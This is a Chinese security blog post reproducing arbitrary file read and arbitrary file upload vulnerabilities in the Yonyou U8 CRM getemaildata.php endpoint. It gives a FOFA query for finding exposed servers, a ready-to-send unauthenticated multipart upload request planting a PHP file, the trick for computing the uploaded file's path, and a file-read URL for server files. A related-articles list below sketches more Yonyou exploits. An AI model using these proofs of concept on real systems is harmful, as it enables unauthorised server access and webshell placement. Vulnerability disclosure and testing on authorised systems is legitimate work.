首页 > 编程语言 >用友U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞&任意文件上传漏洞

用友U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞&任意文件上传漏洞

时间:2023-09-07 16:11:05浏览次数:52  
标签:文件 U8 用友 getemaildata 漏洞 php 任意

漏洞简介

用友U8 CRM客户关系管理系统 getemaildata.php 存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器中的敏感文件。
用友 U8 CRM客户关系管理系统 getemaildata.php文件存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器权限,攻击服务器

漏洞影响

用友 U8 CRM客户关系管理系统

漏洞复现

fofa语法:body="用友U8CRM"
登录页面如下:

文件上传漏洞复现

POC:

POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ

------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="test.php "
Content-Type: text/plain

<?php phpinfo();?>

------WebKitFormBoundarykS5RKgl8t3nwInMQ


PS:访问的解析文件格式为upd***.tmp.php,星号部分为返回的文件名的十六进制减去一,例如上图中(不带mht):B565——>42353635(十六进制),42353634(十六进制减一)——>B565


验证url
http://your-ip/tmpfile/upd十六进制减一.tmp.php

文件读取漏洞复现

POC:

/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini

标签:文件,U8,用友,getemaildata,漏洞,php,任意
From: https://www.cnblogs.com/pursue-security/p/17685217.html

相关文章

  • 用友NC Cloud FS文件服务器SQL注入
    漏洞描述用友NCCloudFS文件管理登录页面对用户名参数没有过滤,存在SQL注入。漏洞影响用友NCCloud且存在FS文件服务器配置管理登录页面。漏洞复现fofa语法:app="用友-NC-Cloud"&&icon_hash="1596996317"用友NCCloud登录页面如下:在应用中存在文件服务器管理登录页面htt......
  • 用友NC service接口信息泄露漏洞
    漏洞描述用友nc有个接口可以获取数据库账户密码,不过是老版本了漏洞复现fofa语法:app="用友-UFIDA-NC"POC:/uapws/servicenuclei批量yaml文件id:yonyou_NC-uapws-server-apiinfo:name:yonyou_NC-uapws-server-apiauthor:nigoriseverity:highdescription:f......
  • 用友NC 6.5未授权文件上传漏洞
    漏洞描述用友NC6.5版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务器控制权限。影响版本NC6.5漏洞复现fofa语法:app="用友-UFIDA-NC"访问页面POC脚本如下:importrequestsimportthreadpoolimporturllib3importsysimportargparseurllib3.di......
  • 服务器数据恢复-断电导致Xen server虚拟化虚拟磁盘文件丢失,虚拟机不可用的数据恢复案
    服务器数据恢复环境:一台某品牌服务器通过一张同品牌某型号RAID卡将4块STAT硬盘组建为一组RAID10阵列。上层部署XenServer虚拟化平台,虚拟机上安装的是WindowsServer操作系统,包括系统盘+数据盘两个虚拟机磁盘,作为Web服务器使用,存放网站代码、SQLServer数据库以及其他网站数据。......
  • Python判断多个文件夹的文件夹名是否包含“分公司”或“营销中心”怎么处理?(方法一)
    大家好,我是皮皮。一、前言前几天在Python最强王者群【哎呦喂 是豆子~】问了一个Python自动化办公的问题,一起来看看吧。大佬们请问下 判断多个文件夹的文件夹名是否包含“分公司”或“营销中心” 有没有什么简便的办法可以实现呀?二、实现过程这里粉丝自己其实已经给了一......
  • buildroot 构建根文件系统(6)添加字体和中文支持
    一、开发背景构建最小系统后成功运行后,Qt程序在界面上文本不显示二、开发需求Qt库编译的程序可以正常运行三、开发环境LinuxUbuntu4.15.0-65-generic+buildroot-2023.02.3+i.mx6d(cortex-A9)四、实现步骤1、添加界面中文支持1)基于前面章......
  • 用友畅捷通T+ Upload.aspx任意文件上传漏洞CNVD-2022-60632
    漏洞描述用友畅捷通T+Upload.aspx接口存在任意文件上传漏洞,攻击者通过preload参数绕过身份验证进行文件上传,控制服务器漏洞影响用友畅捷通T+漏洞复现fofa语法:app="畅捷通-TPlus"登录页面如下:上传文件类型验证不完善,可上传任意文件到服务器中的任意位置,验证POCPOST/......
  • 生成一个数据分析常用的python环境安装文件,使用conda安装
    当使用conda安装Python环境时,可以创建一个名为environment.yml的文件来指定要安装的软件包和其版本。以下是一个示例的environment.yml文件,其中包含了一些常用的数据分析软件包: name:data_analysischannels: -conda-forgedependencies: -python=3.8 -pand......
  • 用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
    漏洞描述用友畅捷通T+DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件漏洞复现fofa语法:app="畅捷通-TPlus"登录页面如下POC:/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Confignuclei批量yaml文件id:yonyou_cha......
  • linux部署NFS服务端与客户端测试(共享文件目录)
    部署NFS服务端与客户端并测试NFS服务端需要安装rpcbind和nfs-utilsNFS客户端只需要安装nfs-utilsnfs端口号2049RPC端口号111++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++服务端:使用yum安装#yuminstall-ynfs-u......